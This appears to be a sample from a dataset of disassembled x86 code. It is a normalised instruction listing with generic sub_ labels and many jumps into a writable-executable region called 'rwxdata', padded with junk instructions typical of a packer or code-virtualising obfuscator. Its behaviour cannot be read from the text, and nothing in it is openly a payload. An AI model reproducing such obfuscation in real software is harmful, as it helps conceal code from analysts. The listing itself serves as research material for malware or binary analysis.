jmp rwxdata
call sub_100649ed
sub_1006557c
lea esp [ esp + 0x18 ]
call sub_10060d95
sub_100658bf
bswap cx
mov ebx [ esp + 0xc ]
pushad
call sub_1005d751
sub_100658cc
xor al 0xb3
jmp sub_10044cb6
sub_10065a55
cmp cl 0x4a
push [ edi ]
pop [ esp + 0x40 ]
cmp ah 0xbc
call sub_10066f2d
sub_10065d67
mov [ esp ] ch
mov [ esp ] edi
call j_sub_1006988a
sub_10065fc5
pushad
movzx ax bl
lea eax [ rwxdata ]
push ecx
call sub_10044187
sub_10066009
bt sp 0x1
cmp [ edi - 0x1 ] 0x0
mov [ esp ] ch
pushad
jmp rwxdata
call sub_100678ff
sub_1006609e
jmp rwxdata
pushad
lea esi [ ebp - 0x4510233b ]
mov esi [ esp + 0x24 ]
pushfd
pushfd
lea esp [ esp + 0x30 ]
jmp rwxdata
call sub_100668e2
sub_100668e2
pushfd
call sub_1005ce59
j_sub_1005db50
jmp sub_1005db50
sub_10066ce4
cmp ch 0xdb
call sub_100418cf
sub_10066f2d
cmp cx 0x247b
bt edx esp
cmp edi ebx
jmp j_sub_10043955
sub_10066f3c
pushfd
push esp
mov [ esp ] 0x85b
lea esp [ esp + 0x8 ]
je rwxdata
add bx 0x2b9e
clc
mov bx [ esi ]
stc
call sub_10042c89
jmp sub_100419bb
sub_10067067
clc
pushfd
rol al 0x6
cmp dl 0xa1
test cx 0xec7
test dl dl
xor al 0xce
call j_sub_1005d11a
sub_100674e7
xor ecx ecx
mov [ esp ] 0x21
mov [ esp ] ch
jmp sub_10068bf6
sub_100674f5
call sub_1005cc35
sub_10067767
test al 0x98
cmp [ edi - 0x1 ] 0x0
pushfd
call sub_10064d0b
j_sub_1005d11a
jmp sub_1005d11a
sub_100681ef
lea esp [ esp + 0x4 ]
call sub_10060d95
sub_10068220
pushfd
lodsb [ esi ]
clc
stc
bt si di
call sub_1005ca59
sub_1006823d
rol ch 0x7
push edx
shrd ebx ecx 0x1e
add edi eax
btc bx 0x1
jmp rwxdata
call sub_1006ac6b
sub_10068898
[ edi ]
call sub_10069a74
sub_10068bf6
lea esp [ esp + 0x4 ]
call sub_100419c9
pushfd
jmp sub_1006506e
sub_10068c9b
call j_sub_1004273d
sub_10068e42
pushfd
cmp ah 0x76
pushfd
cmp eax edx
mov [ esp ] dl
call sub_1006321a
sub_1006903a
adc dl dl
lea esp [ esp + 0x3c ]
pushad
jmp rwxdata
push ebp
jmp rwxdata
lea esp [ esp + 0x24 ]
retn
j_sub_1004438d
xor eax eax
jmp sub_1004438d
sub_1006956e
call sub_100661db
j_sub_10065401
jmp sub_10065401
j_sub_10060aec
jmp sub_10060aec
sub_1006988a
mov [ esp ] dl
mov [ esp ] cl
mov [ esp ] ebx
call sub_100681ef
sub_10069d6b
mov [ esp ] 0x8af04018
call j_sub_100639d5
sub_10069fda
add ebx eax
mov [ esp + 0x4 ] cl
shr cx cl
mov [ ebp - 0x8 ] 0x0
call sub_10069ab5
sub_1006ad27
call sub_1005d036
sub_1006ad2c
mov esi [ ebp + 0xc ]
lea esp [ esp + 0x8 ]
call sub_10041d30
sub_1006ade5
cmp eax [ ebp - 0x10 ]
jmp sub_1006773c
sub_10076b18
jmp rwxdata
mov [ esp + 0x44 ] rwxdata
mov [ esp ] ebp
jmp sub_10041363
j_sub_100413b7
jmp sub_100413b7
sub_10077273
cmc
call sub_1006465e
sub_10077342
call sub_10078cea
sub_100773b0
mov [ esp + 0x20 ] esi
jmp sub_10078975
sub_1007750a
pushad
push 0x3a4676f0
mov [ esp + 0x2c ] rwxdata
call sub_10078cdc
cmp dh 0xd5
sub ax bx
call j_sub_10077855
sub_100775aa
call sub_10077824
sub_1007767c
xchg [ ebp ] eax
jmp sub_1007750a
sub_100776be
mov [ esp ] 0xa5
call sub_100791f3
sub_1007771a
sub bl al
call sub_100793a7
sub_100777f8
stc
mov ecx [ eax * 4 + rwxdata ]
pushad
call sub_10079074
sub_10077824
pushfd
mov [ esp + 0x28 ] ebp
mov [ esp ] ah
mov [ esp + 0x24 ] edx
pushad
mov [ esp + 0x40 ] esi
call sub_100787f7
sub_10077855
clc
add ax 0x209e
push 0x122f818e
pushfd
clc
neg ax
call sub_10078dff
sub_100778cb
sub ecx 0x1
jmp j_sub_1007824e
j_sub_100773d1
jmp sub_100773d1
sub_10077ab3
cmp sp 0xe560
sub bx ax
push [ esp + 0x4 ]
cmp bx 0x3eae
push esp
cmc
sub ebp 0x2
call sub_10078a3d
sub_10077ace
or ecx ecx
mov [ esp + 0xc ] dh
push 0xab652008
pushad
lea esp [ esp + 0x34 ]
je rwxdata
call sub_10078148
call sub_10079210
sub_10077c10
mov [ esp ] 0x28df
pushad
push [ esp + 0x24 ]
pop [ ebp ]
push 0xdd1df9c2
mov [ esp ] 0x70da
lea esp [ esp + 0x2c ]
jmp sub_10077ecb
sub_10077d98
push 0x2d3807c7
push ebp
mov [ ebp ] ax
push ebp
pushfd
lea esp [ esp + 0x14 ]
jmp sub_10077ecb
sub_10077e97
stc
bt dx di
sub ebp 0x2
jmp sub_10077d98
sub_10077ecb
bswap ax
add al dl
lea eax [ edi + 0x50 ]
push edx
pushad
cmp ebp eax
jmp rwxdata
jmp sub_10079433
j_sub_10077855
jmp sub_10077855
sub_10077f91
push eax
call sub_100796ce
sub_10078148
cmp cl 0xf3
sub eax eax
call sub_100794dc
j_sub_1007824e
jmp sub_1007824e
sub_10078169
mov [ ebp ] edx
push ecx
push esp
lea esp [ esp + 0x50 ]
jmp sub_10077ecb
sub_10078229
inc esi
dec cl
movsx cx dl
lea ecx [ esi - 0x9460c38 ]
xor ch ah
movzx ecx al
stc
bt edx esp
pushad
call sub_10077f3e
sub_1007824e
lea esp [ esp + 0x8 ]
jne rwxdata
call sub_10079210
call sub_10078148
sub_100786bc
inc al
setno dh
neg al
pushfd
pushad
ror al 0x2
call sub_1007771a
sub_100787d2
jmp rwxdata
mov [ esp + 0x24 ] esi
call sub_10077614
sub_100787f7
mov [ esp + 0x8 ] 0x50
call sub_10078d05
j_sub_10079160
jmp sub_10079160
sub_10078975
push [ esp + 0x10 ]
lea esp [ esp + 0x24 ]
jge rwxdata
pushfd
call sub_10079340
push edi
mov [ esp ] ebp
call sub_100776be
sub_10078a3d
mov [ esp + 0x4 ] 0xc39
pushad
mov [ ebp ] ax
push [ esp + 0x10 ]
mov [ esp ] 0x4f17
mov [ esp + 0x1c ] 0x28
lea esp [ esp + 0x48 ]
jmp sub_10077ecb
sub_10078b3f
sar dx 0x3
add bl al
xor dx 0xfe1c
bswap dx
rol dl cl
movzx dx cl
mov dx [ ebp ]
call sub_10078cf9
sub_10078b5c
mov [ esp + 0x24 ] esi
call sub_1007812a
sub_10078cdc
push esp
pushfd
mov [ esp + 0x34 ] eax
pushfd
push [ esp + 0x38 ]
retn 0x3c
sub_10078cea
call sub_10079698
sub_10078cf9
cmc
cmp bh 0x2c
add ebp 0x2
call sub_10077e4c
sub_10078db5
bsf ax di
bts ax 0xe
rol ah 0x6
mov eax ebp
jmp sub_10077e97
sub_10078dff
ror ax 0x1
mov [ esp + 0xc ] 0x32
jmp sub_10077ab3
sub_10078e48
mov [ esp + 0x4 ] edx
pushad
call sub_10078b5c
sub_10078e71
call sub_100772e4
call sub_100790b0
sub_10078f31
cmc
cmc
add ecx 0x0
call sub_10078e71
sub_10079074
pushfd
neg ecx
cmc
call sub_10078f31
sub_1007909b
mov [ esp ] 0xc5
mov [ esp ] eax
pushad
push [ esp ]
mov [ esp + 0x20 ] ebx
pushfd
call sub_100787d2
sub_100790b0
cmc
push [ ebp ]
pop [ esp ]
test dl 0x2f
call sub_10078c01
sub_10079137
mov [ esp + 0x2c ] eax
push ebx
push [ esp + 0x30 ]
retn 0x34
sub_10079148
xchg [ esp + 0x40 ] esi
cld
pop edi
mov esi edx
pushfd
cld
lea edi [ ecx + eax - 0x40 ]
call sub_10077342
sub_10079197
bt bx 0xd
clc
test bx di
xchg [ ebp + ecx * 4 ] eax
cmp bh 0x6
mov [ esp ] eax
call sub_1007977b
sub_100791f3
push 0x37daba82
mov [ esp + 0x8 ] edx
pushfd
push 0x177d1823
push 0x1066d885
mov [ esp + 0x10 ] esi
call sub_10077573
sub_10079210
stc
cmp al 0xd
mov [ esp ] si
sub eax eax
jmp sub_10079197
sub_10079340
mov [ esp + 0x4 ] ebp
call sub_10078e48
j_sub_10077f91
jmp sub_10077f91
sub_100794dc
call sub_1007767c
sub_100794e1
pushad
mov [ esp + 0x24 ] eax
push [ esp ]
jmp rwxdata
mov [ esp + 0x24 ] ebx
call sub_1007912d
sub_10079698
push 0xe17256ee
xchg [ esp + 0x4c ] edi
lea edi [ eax * 2 + 0x24e6d209 ]
mov edi eax
mov [ esp + 0x4 ] ah
jmp rwxdata
mov [ esp + 0x4 ] bl
cld
call j_sub_100773d1
sub_100796ce
push ecx
call sub_10077dad
sub_1007977b
call sub_100778cb
sub_1007982d
dec esi
stc
rcr bl cl
ror di cl
btr ebx 0x2
lea ebp [ esp + 0xc ]
jmp sub_100778e2
sub_100798ff
mov ecx [ eax * 4 + rwxdata ]
stc
call sub_100793e5
pushfd
push [ esp + 0x30 ]
pop [ ebp ]
mov [ esp ] 0x55ed9540
pushfd
mov [ esp + 0xc ] 0x78b5
push [ esp ]
lea esp [ esp + 0x3c ]
jmp sub_10077ecb
